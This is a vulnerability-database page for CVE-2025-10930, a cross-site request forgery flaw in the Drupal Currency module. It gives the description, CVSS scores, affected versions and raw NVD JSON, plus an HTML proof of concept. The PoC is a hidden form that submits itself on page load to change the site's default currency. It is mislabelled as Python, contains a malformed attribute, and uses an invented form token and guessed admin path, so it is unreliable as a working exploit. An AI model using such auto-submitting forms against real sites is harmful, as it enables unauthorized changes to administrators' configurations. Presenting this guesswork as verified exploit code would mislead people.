Security Vulnerability Report
中文
CVE-2025-10930 CVSS 4.3 MEDIUM

CVE-2025-10930

Published: 2025-10-30 00:15:34
Last Modified: 2025-12-12 18:06:16

Description

Cross-Site Request Forgery (CSRF) vulnerability in Drupal Currency allows Cross Site Request Forgery.This issue affects Currency: from 0.0.0 before 3.5.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:2bits:currency:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal Currency < 3.5.0
Drupal Currency 0.0.0 - 3.4.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-10930 --> <!-- This PoC demonstrates a CSRF attack targeting Drupal Currency module --> <!-- When an admin visits this page, it will attempt to submit a malicious request --> <!DOCTYPE html> <html> <head> <title>Currency Configuration Update</title> </head> <body> <h1>Currency Configuration Update PoC</h1> <p>This page demonstrates the CSRF vulnerability in Drupal Currency module.</p> <!-- Malicious form targeting Currency module admin interface --> <form id="csrfForm" action="https://target-drupal-site.com/admin/config/currency" method="POST" style="display:none;"> <input type="hidden" name="currency[config][default_currency]" value="XXX" /> <input type="hidden"="form_token" value="exploited" /> <input type="hidden" name="op" value="Save configuration" /> </form> <script> // Auto-submit the form when page loads document.addEventListener('DOMContentLoaded', function() { // Submit the malicious form document.getElementById('csrfForm').submit(); console.log('CSRF payload submitted'); }); </script> <p>If you see this message, the form has been submitted.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10930", "sourceIdentifier": "[email protected]", "published": "2025-10-30T00:15:34.303", "lastModified": "2025-12-12T18:06:15.627", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Drupal Currency allows Cross Site Request Forgery.This issue affects Currency: from 0.0.0 before 3.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:2bits:currency:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "8.x-3.5", "matchCriteriaId": "BDCBCFF5-66BC-4AAB-A057-215847180E27"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2025-110", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}